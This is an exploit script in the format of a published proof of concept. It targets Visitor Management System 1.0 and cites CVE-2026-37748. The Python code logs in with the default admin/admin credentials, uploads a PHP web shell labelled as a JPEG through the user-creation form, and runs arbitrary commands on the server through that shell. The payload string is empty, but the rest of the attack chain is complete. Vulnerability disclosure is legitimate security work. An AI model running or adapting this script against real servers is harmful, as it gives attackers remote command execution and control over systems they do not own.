# Exploit Title: Visitor Management System 1.0 - Remote Code Execution # Date: 2026-04-02 # Exploit Author: Varad AP Mene (menevarad007@gmail.com) # Vendor: https://github.com/sanjay1313/Visitor-Management-System # Version: 1.0 # CVE: CVE-2026-37748 # Tested on: Windows 10 / XAMPP, Kali Linux import requests import argparse import sys WEBSHELL = b'' def login(base_url, session): url = f"{base_url}/vms/index.php" data = {'username': 'admin', 'password': 'admin', 'submit': 'submit'} r = session.post(url, data=data, timeout=10) return r.status_code == 200 def upload_shell(base_url, session): url = f"{base_url}/vms/php/admin_user_insert.php" files = {'image': ('shell.php', WEBSHELL, 'image/jpeg')} data = {'name': 'test', 'username': 'test123', 'password': 'test123', 'submit': 'submit'} r = session.post(url, files=files, data=data, timeout=10) return r.status_code == 200 def execute(base_url, session, cmd): url = f"{base_url}/vms/images/shell.php" r = session.get(url, params={'cmd': cmd}, timeout=10) return r.text.strip() def main(): parser = argparse.ArgumentParser(description='CVE-2026-37748 PoC') parser.add_argument('--url', required=True, help='Target URL') parser.add_argument('--cmd', default='id', help='Command to execute') args = parser.parse_args() base = args.url.rstrip('/') session = requests.Session() print(f"[*] Target: {base}") print(f"[*] Logging in...") if not login(base, session): print("[-] Login failed"); sys.exit(1) print("[+] Login successful!") print("[*] Uploading webshell...") if not upload_shell(base, session): print("[-] Upload failed"); sys.exit(1) print(f"[+] Shell uploaded → {base}/vms/images/shell.php") print(f"[*] Executing: {args.cmd}") result = execute(base, session, args.cmd) print(f"[+] Result:\n{result}") if __name__ == '__main__': main()